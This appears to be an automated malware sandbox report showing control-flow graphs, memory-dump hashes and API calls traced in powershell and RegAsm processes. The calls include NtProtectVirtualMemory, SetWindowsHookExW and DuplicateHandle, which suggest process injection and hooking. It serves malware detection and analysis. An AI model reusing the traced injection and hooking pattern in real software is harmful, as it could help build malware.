                                                                            control_flow_graph 537 7ffd3461055d-7ffd34610567 538 7ffd3461056e-7ffd3461057f 537->538 539 7ffd34610569 537->539 541 7ffd34610581 538->541 542 7ffd34610586-7ffd34610597 538->542 539->538 540 7ffd3461056b 539->540 540->538 541->542 543 7ffd34610583 541->543 544 7ffd3461059e-7ffd346105af 542->544 545 7ffd34610599 542->545 543->542 546 7ffd346105b1 544->546 547 7ffd346105b6-7ffd346105c7 544->547 545->544 548 7ffd3461059b 545->548 546->547 549 7ffd346105b3 546->549 550 7ffd346105ce-7ffd3461068f 547->550 551 7ffd346105c9 547->551 548->544 549->547 556 7ffd34610695-7ffd3461069f 550->556 557 7ffd346108a6-7ffd34610904 550->557 551->550 552 7ffd346105cb 551->552 552->550 558 7ffd346106a1-7ffd346106b9 556->558 559 7ffd346106bb-7ffd346106c8 556->559 575 7ffd3461092f-7ffd3461093b 557->575 576 7ffd34610906-7ffd3461092d 557->576 558->559 565 7ffd346106ce-7ffd346106d1 559->565 566 7ffd3461083b-7ffd34610845 559->566 565->566 569 7ffd346106d7-7ffd346106df 565->569 570 7ffd34610847-7ffd34610857 566->570 571 7ffd34610858-7ffd346108a3 566->571 569->557 573 7ffd346106e5-7ffd346106ef 569->573 571->557 577 7ffd346106f1-7ffd346106ff 573->577 578 7ffd34610709-7ffd3461070f 573->578 584 7ffd34610946-7ffd34610957 575->584 576->575 577->578 583 7ffd34610701-7ffd34610707 577->583 578->566 581 7ffd34610715-7ffd34610718 578->581 585 7ffd34610761 581->585 586 7ffd3461071a-7ffd3461072d 581->586 583->578 596 7ffd34610960-7ffd3461096f 584->596 597 7ffd34610959 584->597 587 7ffd34610763-7ffd34610765 585->587 586->557 598 7ffd34610733-7ffd3461073d 586->598 587->566 589 7ffd3461076b-7ffd3461076e 587->589 594 7ffd34610770-7ffd34610779 589->594 595 7ffd34610785-7ffd34610789 589->595 594->595 595->566 607 7ffd3461078f-7ffd34610795 595->607 599 7ffd34610971 596->599 600 7ffd34610978-7ffd346109f5 596->600 597->596 601 7ffd3461073f-7ffd34610754 598->601 602 7ffd34610756-7ffd3461075f 598->602 599->600 617 7ffd346109f7-7ffd34610a07 600->617 618 7ffd34610a68-7ffd34610a72 600->618 601->602 602->587 609 7ffd346107b1-7ffd346107b7 607->609 610 7ffd34610797-7ffd346107a4 607->610 612 7ffd346107d3-7ffd34610810 609->612 613 7ffd346107b9-7ffd346107c6 609->613 610->609 620 7ffd346107a6-7ffd346107af 610->620 640 7ffd34610812-7ffd34610827 612->640 641 7ffd34610829-7ffd3461083a 612->641 613->612 621 7ffd346107c8-7ffd346107d1 613->621 628 7ffd34610a14-7ffd34610a2a 617->628 629 7ffd34610a09-7ffd34610a12 617->629 622 7ffd34610a74-7ffd34610a79 618->622 623 7ffd34610a7c-7ffd34610ac1 618->623 620->609 621->612 627 7ffd34610a7a-7ffd34610a7b 622->627 628->627 637 7ffd34610a2c-7ffd34610a65 628->637 629->628 637->618 640->641
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2355395276.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34610000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: p2u4
                                                                            • API String ID: 0-510146424
                                                                            • Opcode ID: ae430ceea6573d703e2d2251c7d7a3b2a125ef080f3939b68ebb7c5b1b6904f8
                                                                            • Instruction ID: f6c8c08e259cd28d40571406996a98d80e3cc6ebf2a185d5a9a179582305b602
                                                                            • Opcode Fuzzy Hash: ae430ceea6573d703e2d2251c7d7a3b2a125ef080f3939b68ebb7c5b1b6904f8
                                                                            • Instruction Fuzzy Hash: 2B122561A0EBC50FEB968B2958B51B47FE1EF47210B0941FBD18DCB5A3D91CAC06D392

                                                                            Control-flow Graph

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f0eab7050ad9b92f715b5c1eb086a711c9e70c96bb96f46187d79a7b5a428ac
                                                                            • Instruction ID: 71c2e9d9580914840887c34683282b60b875f35cae4dfc0c47a9eea25e3cb984
                                                                            • Opcode Fuzzy Hash: 3f0eab7050ad9b92f715b5c1eb086a711c9e70c96bb96f46187d79a7b5a428ac
                                                                            • Instruction Fuzzy Hash: 5861F831E0DA484FE759DB6C985A6B97BE1FF9A310F05427FD04DD7292DF28A8028781

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 674 7ffd3454c809-7ffd3454c873 679 7ffd3454c87d-7ffd3454c8dc CreateFileW 674->679 680 7ffd3454c875-7ffd3454c87a 674->680 681 7ffd3454c8e4-7ffd3454c90c 679->681 682 7ffd3454c8de 679->682 680->679 682->681
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 95891ba81b00b8064bca23380aca6b0502979a3eeedabe865af8c9c5240d7041
                                                                            • Instruction ID: 0d2a278756b0aecca9a55d83bd07f0ead149e4b3d8469047e000fd034749d0e0
                                                                            • Opcode Fuzzy Hash: 95891ba81b00b8064bca23380aca6b0502979a3eeedabe865af8c9c5240d7041
                                                                            • Instruction Fuzzy Hash: 42318131A1CA5C8FDB58EF58D845AE9BBE0FB69321F14422EE049E3251CB75A8058B81

                                                                            Control-flow Graph

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2355395276.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34610000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f690d01a04e7fb58aedd2577a5393580ebcb75ae563d0bf81191410b89ff455
                                                                            • Instruction ID: 2c620310e56157f38a5aa2208d235b8db00aec76ce827ffe451267f268a37b41
                                                                            • Opcode Fuzzy Hash: 7f690d01a04e7fb58aedd2577a5393580ebcb75ae563d0bf81191410b89ff455
                                                                            • Instruction Fuzzy Hash: AA51D322F0EE970BEBE99A6818F12F566C2EF86350F5805BED65EC71D3DD1CA801D241

                                                                            Control-flow Graph

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2355395276.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34610000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6d4043e8462690ce2bc5c735755b861fba4d9886042299761c4a02681620cc6
                                                                            • Instruction ID: 4bdb49ef32e4c4326739a76036f125742b4a2c504ff073ba033207cef3bd79c8
                                                                            • Opcode Fuzzy Hash: e6d4043e8462690ce2bc5c735755b861fba4d9886042299761c4a02681620cc6
                                                                            • Instruction Fuzzy Hash: 8E41D413F0EE971BFBEA9A2814F52F452C2EF96350F9805BAD65EC31D2DD1CA8419241
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2355395276.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34610000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5de6632f76376789a06bd66e4a6f3c108a78c079d52c2b4363a0e5bc31d82f8
                                                                            • Instruction ID: ae5e7a789987507d7a487f3cf83a438e4b71edc07d49507133ed7fe9533ccc4d
                                                                            • Opcode Fuzzy Hash: d5de6632f76376789a06bd66e4a6f3c108a78c079d52c2b4363a0e5bc31d82f8
                                                                            • Instruction Fuzzy Hash: 1B21F632B0CA290FEBE59A5C64B65F9F3D2EF95220B5402B7D50EC3296DD1DA851C3C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2355395276.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34610000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a7057e7ae3ccecaabcc09f52d50d075f629167201a293ac9cfdc7c1501a26ee4
                                                                            • Instruction ID: 2dc0d4868ad11547a10953d972b55aa10352e3d9b97cd8267079d50e8df291b2
                                                                            • Opcode Fuzzy Hash: a7057e7ae3ccecaabcc09f52d50d075f629167201a293ac9cfdc7c1501a26ee4
                                                                            • Instruction Fuzzy Hash: 42F02723F4D96A0AF7E6E95C38B71F893C2EF96634B5802B3D55DC3292DC08AC118380
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "'~4$"'~4$"'~4$"'~4$"'~4$"'~4
                                                                            • API String ID: 0-1221630383
                                                                            • Opcode ID: 1ad2edd657cfbe134969f5cd05be8fe6eff89fc77e47bc44220fe9b9dc950338
                                                                            • Instruction ID: 506a5808bf210d9e0dbfee9892469e47e7f711d4ebc7650a2dc32e8ead001a1c
                                                                            • Opcode Fuzzy Hash: 1ad2edd657cfbe134969f5cd05be8fe6eff89fc77e47bc44220fe9b9dc950338
                                                                            • Instruction Fuzzy Hash: EC420422F1C9464BE75DA71898A66B977C1FF9A714F04417EE18EC72C3DE2CE8428781
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `T}4$`T}4$`T}4
                                                                            • API String ID: 0-2954441546
                                                                            • Opcode ID: 8e3fc92476117eed1fd45c49e4850bbfdf9748aa8fba43695702134b68db5e82
                                                                            • Instruction ID: a627a0bdf8aa6cfccee34da95b7512c0763b4e22a5d07d7f3ee2c3c06236dc60
                                                                            • Opcode Fuzzy Hash: 8e3fc92476117eed1fd45c49e4850bbfdf9748aa8fba43695702134b68db5e82
                                                                            • Instruction Fuzzy Hash: 7A226171A1CB4A4FE7B9DF1C949567AB3E1EB99311F10467ED08DC3291DE38E8428782
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q|4$`T}4
                                                                            • API String ID: 0-1876357954
                                                                            • Opcode ID: 4950148a25f5dd05620473e0d372d47a5254b5d378342c9e858358965b82b863
                                                                            • Instruction ID: 9228881207ba7261a78a39f560f51e3a20b37fc034527dec606fca5dcbfcd738
                                                                            • Opcode Fuzzy Hash: 4950148a25f5dd05620473e0d372d47a5254b5d378342c9e858358965b82b863
                                                                            • Instruction Fuzzy Hash: 8A22D331A0CB854FE75AEB2888A56657FE1EF57310B1941FAD089CB1D3DE2CAC46C742
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: -O_
                                                                            • API String ID: 0-923700732
                                                                            • Opcode ID: c8aa51fa2e1c7aae00bfbda1d0c09f98e8177fa32c13c62e4dc9af2c12e4978d
                                                                            • Instruction ID: dcdec69d051e2aed45ad166aae38a0077b7ccc089c247af8e379f3807314e078
                                                                            • Opcode Fuzzy Hash: c8aa51fa2e1c7aae00bfbda1d0c09f98e8177fa32c13c62e4dc9af2c12e4978d
                                                                            • Instruction Fuzzy Hash: 4941B617E0D7C25BEB23A67A58BA0D63FA0DF5326470910F7C685CE197DD0C590AA252

                                                                            Execution Graph

                                                                            Execution Coverage:12.8%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:37.5%
                                                                            Total number of Nodes:8
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 31054 1583cf8 31055 1583d3c SetWindowsHookExW 31054->31055 31057 1583d82 31055->31057 31058 1583370 31059 15833be NtProtectVirtualMemory 31058->31059 31061 1583408 31059->31061 31062 15897a0 DuplicateHandle 31063 1589836 31062->31063

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 1582f19-1582f5c 1 1582f68-1582f6b 0->1 2 1582f5e-1582f60 0->2 3 15832d6-1583305 1->3 5 1582f71-1582f94 1->5 2->3 4 1582f66 2->4 21 158330c-1583310 3->21 4->5 8 1582fa0-1582fa3 5->8 9 1582f96-1582f98 5->9 8->3 12 1582fa9-1582fcf 8->12 9->3 11 1582f9e 9->11 11->12 15 1582fdd-1582fe1 12->15 16 1582fd1-1582fd5 12->16 15->3 17 1582fe7-1582ff5 15->17 16->3 19 1582fdb 16->19 22 1583004-158300c 17->22 23 1582ff7-1583002 17->23 19->17 24 158331d-1583406 NtProtectVirtualMemory 21->24 25 1583312-158331c 21->25 26 158300f-1583011 22->26 23->26 54 1583408-158340e 24->54 55 158340f-1583434 24->55 28 158301d-1583020 26->28 29 1583013-1583015 26->29 28->3 31 1583026-1583049 28->31 29->3 30 158301b 29->30 30->31 35 158304b-158304d 31->35 36 1583055-1583058 31->36 35->3 37 1583053 35->37 36->3 38 158305e-1583082 36->38 37->38 41 158308e-1583091 38->41 42 1583084-1583086 38->42 41->3 45 1583097-15830b8 41->45 42->3 44 158308c 42->44 44->45 49 15830ba-15830bc 45->49 50 15830c4-15830c7 45->50 49->3 51 15830c2 49->51 50->3 52 15830cd-15830f1 50->52 51->52 59 15830fd-1583100 52->59 60 15830f3-15830f5 52->60 54->55 59->3 61 1583106-158312a 59->61 60->3 62 15830fb 60->62 65 158312c-158312e 61->65 66 1583136-1583139 61->66 62->61 65->3 67 1583134 65->67 66->3 68 158313f-1583163 66->68 67->68 70 158316f-1583172 68->70 71 1583165-1583167 68->71 70->3 73 1583178-158318b 70->73 71->3 72 158316d 71->72 72->73 73->21 75 1583191-15831c0 73->75 76 15831cc-15831cf 75->76 77 15831c2-15831c4 75->77 76->3 79 15831d5-15831ed 76->79 77->3 78 15831ca 77->78 78->79 81 15831f9-15831fc 79->81 82 15831ef-15831f1 79->82 81->3 84 1583202-1583219 81->84 82->3 83 15831f7 82->83 83->84 87 158321f-1583242 84->87 88 15832c5-15832ce 84->88 89 158324e-1583251 87->89 90 1583244-1583246 87->90 88->75 91 15832d4 88->91 89->3 93 1583257-1583287 89->93 90->3 92 158324c 90->92 91->21 92->93 95 1583289-158328b 93->95 96 158328f-1583292 93->96 95->3 97 158328d 95->97 96->3 98 1583294-15832b1 96->98 97->98 100 15832b9-15832bc 98->100 101 15832b3-15832b5 98->101 100->3 103 15832be-15832c3 100->103 101->3 102 15832b7 101->102 102->103 103->21
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 015833F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4581555710.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_1580000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: 4bfe1d52738b4407fa8e6db27bc97bd409eee8446af353f79d0e4ef06d50d620
                                                                            • Instruction ID: 503f68d21d8046449697952704dd21c28297f3c3cbb9f8bddb634a54a9254e97
                                                                            • Opcode Fuzzy Hash: 4bfe1d52738b4407fa8e6db27bc97bd409eee8446af353f79d0e4ef06d50d620
                                                                            • Instruction Fuzzy Hash: 09E1A731F0430A87DB94EAAD8C903AE76E37FC4624F588239E916EF3C5EA74D8019741

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 373 1583370-1583406 NtProtectVirtualMemory 376 1583408-158340e 373->376 377 158340f-1583434 373->377 376->377
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 015833F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4581555710.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_1580000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: 5cf56e7b92f79fb8dd27bee754163966be3bb4b8d68e9905279bc7616c252fc0
                                                                            • Instruction ID: af5eab64a8021cb56885a8841cbd23c3c623c46854bfc6f0f2d1e5ea01185c97
                                                                            • Opcode Fuzzy Hash: 5cf56e7b92f79fb8dd27bee754163966be3bb4b8d68e9905279bc7616c252fc0
                                                                            • Instruction Fuzzy Hash: 252103B1D013499FDB10DFAAD984ADEFBF4FF48710F20842AE519A7210CB75A910CBA0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 353 158985f-158998e
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4581555710.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_1580000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3798277329d5accdad4e5be155475c0854188f22c29e916de3a1faa7e5326638
                                                                            • Instruction ID: 7303a608457e4bd0fd0646ff124c0c6c3633f2def2502f801454ad5b1848d4ad
                                                                            • Opcode Fuzzy Hash: 3798277329d5accdad4e5be155475c0854188f22c29e916de3a1faa7e5326638
                                                                            • Instruction Fuzzy Hash: EC411774A10245DFEB05DF64E985AA97FF9FB88301F11806AF941AB381CB785911EF22

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 367 1589799-158979b 368 15897a0-1589834 DuplicateHandle 367->368 369 158983d-158985a 368->369 370 1589836-158983c 368->370 370->369
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01589827
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4581555710.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_1580000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 266e43779b245597ff6e7ee96e075cb1b163f9dff361770e9f9bfcd8369ca022
                                                                            • Instruction ID: ba846c83abed30967b77cf3953466c573f9ffeb7492bb47318729021361a7e75
                                                                            • Opcode Fuzzy Hash: 266e43779b245597ff6e7ee96e075cb1b163f9dff361770e9f9bfcd8369ca022
                                                                            • Instruction Fuzzy Hash: 552103B6900249DFDB10CF9AD984ADEBFF4FB48320F14841AE918A7310D378A940CFA0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 381 15897a0-1589834 DuplicateHandle 382 158983d-158985a 381->382 383 1589836-158983c 381->383 383->382
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01589827
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4581555710.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_1580000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 936d42ed3253f48098dbe1b9cdb19fce62b3ecb2609fde55d953d897dfc52ab9
                                                                            • Instruction ID: 8aa8c96f34dad9e9c8f87c53113f8c29ef7af750239a25f5a42c1c2e09413aea
                                                                            • Opcode Fuzzy Hash: 936d42ed3253f48098dbe1b9cdb19fce62b3ecb2609fde55d953d897dfc52ab9
                                                                            • Instruction Fuzzy Hash: 5521B3B5900249DFDB10CF9AD984ADEBBF4FB48324F14841AE914A7210D774A954CFA5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 386 1583cf0-1583d42 389 1583d4e-1583d80 SetWindowsHookExW 386->389 390 1583d44 386->390 391 1583d89-1583dae 389->391 392 1583d82-1583d88 389->392 393 1583d4c 390->393 392->391 393->389
                                                                            APIs
                                                                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01583D73
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4581555710.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_1580000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: bf8754864f12ddd9d7d9df2da6c3bcb875d25d658a47389535ff293040e6e241
                                                                            • Instruction ID: 9c07ee65f712bcf12a1f39f7b853a766bd55580a0efc8faef9d8afdcb0fd8668
                                                                            • Opcode Fuzzy Hash: bf8754864f12ddd9d7d9df2da6c3bcb875d25d658a47389535ff293040e6e241
                                                                            • Instruction Fuzzy Hash: 172134B59002499FDB14DFAAC844BDEBBF4BF88720F10842AE519B7250CB74A944CFA0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 397 1583cf8-1583d42 399 1583d4e-1583d80 SetWindowsHookExW 397->399 400 1583d44 397->400 401 1583d89-1583dae 399->401 402 1583d82-1583d88 399->402 403 1583d4c 400->403 402->401 403->399
                                                                            APIs
                                                                            • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01583D73
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4581555710.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_1580000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: 6f1b9eb57853fe5ff8bd64cfbc6444e03326d2e7c75463ef7b1ced0392cced32
                                                                            • Instruction ID: 01e75b33c29a3067a4317fda0f0369049306d8e13acb32eb5e68b208e788872b
                                                                            • Opcode Fuzzy Hash: 6f1b9eb57853fe5ff8bd64cfbc6444e03326d2e7c75463ef7b1ced0392cced32
                                                                            • Instruction Fuzzy Hash: 332115B59002499FDB54DF9AC844BDEBBF5BF88720F108419D519A7250CB74A944CFA1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 468 6d67287-6d67294 469 6d67296-6d672ec 468->469 470 6d6722a-6d67232 468->470 490 6d672ee-6d672f6 469->490 471 6d67238-6d6723a 470->471 473 6d671b2-6d671ca 471->473 474 6d67240-6d67286 471->474 478 6d671d4-6d671de 473->478 479 6d671cc-6d671d2 473->479 481 6d671e0-6d671f3 478->481 479->481 488 6d671f5-6d671fb 481->488 489 6d671fd-6d67202 481->489 491 6d67207-6d67212 488->491 489->491 494 6d672fe-6d67317 490->494 495 6d67214-6d67224 491->495 496 6d6722b-6d6722e 491->496 499 6d67322-6d67340 494->499 500 6d67319 494->500 495->496 496->471 499->490 503 6d67342-6d673fa call 6d6583c 499->503 500->499 515 6d67405 503->515 516 6d673fc 503->516 517 6d67406 515->517 516->515 517->517
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4605237261.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6d60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: G
                                                                            • API String ID: 0-985283518
                                                                            • Opcode ID: 6950d350319b8db0f54ebe7af8f5d032ab1c706b31b73ebcb0dd8a997ca5de86
                                                                            • Instruction ID: 5a3a196e0025193f1de26b08d8115780002bc72a0f86cb9169741b35552650d5
                                                                            • Opcode Fuzzy Hash: 6950d350319b8db0f54ebe7af8f5d032ab1c706b31b73ebcb0dd8a997ca5de86
                                                                            • Instruction Fuzzy Hash: 9621D270710109AFDB28CB29C959BAE7BF6EF88708F250059F502EB391CB748D05CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4605237261.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6d60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e9a728aeb1e25be66f6a82267d85d9caeab69152a298c08d4f53c916aa316169
                                                                            • Instruction ID: c822c4c050099aab0b974fff9ec7a523742884b52e7acbcfdedd3215610aae9b
                                                                            • Opcode Fuzzy Hash: e9a728aeb1e25be66f6a82267d85d9caeab69152a298c08d4f53c916aa316169
                                                                            • Instruction Fuzzy Hash: A8B19D74B102099FDB48DFBDC85066EBBE6FFC8210B24856AE909DB351DE70DC058BA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4605237261.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6d60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f7b6122bd5f87ce04816ae2089636f7bb6e50de7f7f37c5dc400d6c03d4a850b
                                                                            • Instruction ID: 462fa8a3ec023ea1a39a11946fe26c861158ea975b722492365323621545f57e
                                                                            • Opcode Fuzzy Hash: f7b6122bd5f87ce04816ae2089636f7bb6e50de7f7f37c5dc400d6c03d4a850b
                                                                            • Instruction Fuzzy Hash: 489103317042059FDB65CF26D884E6BBBB6FF89360B04856AF946CB352CB31D905CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4605237261.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6d60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 35432e97263e3d1abad9f6b7f71bb1eb31164d69424a904821cfd3f9af89d125
                                                                            • Instruction ID: ee5e65db91e93026a7f7157a55f46781658dcddb8e6050eefb5f28616f4204c9
                                                                            • Opcode Fuzzy Hash: 35432e97263e3d1abad9f6b7f71bb1eb31164d69424a904821cfd3f9af89d125
                                                                            • Instruction Fuzzy Hash: AC91A030B102058FEB49EF79D49466E7BB2FFC8204B508569E906AB341EF799C46CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.4605237261.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6d60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 955ec95588066b5eeeb55d0b53876b29ae16c04dd6fecceeaae37bebada46ee2
                                                                            • Instruction ID: 967f8829f1eb750a87e70ae8d0e3e100ad2aaee26709413b1c1fc4fd9c4ce749
                                                                            • Opcode Fuzzy Hash: 955ec95588066b5eeeb55d0b53876b29ae16c04dd6fecceeaae37bebada46ee2
                                                                            • Instruction Fuzzy Hash: 74817E35B002068FDB58DF69D4547AEB7B2FB88311F148529E902E7391CB39DD51CB90
                                                                            Memory Dump Source
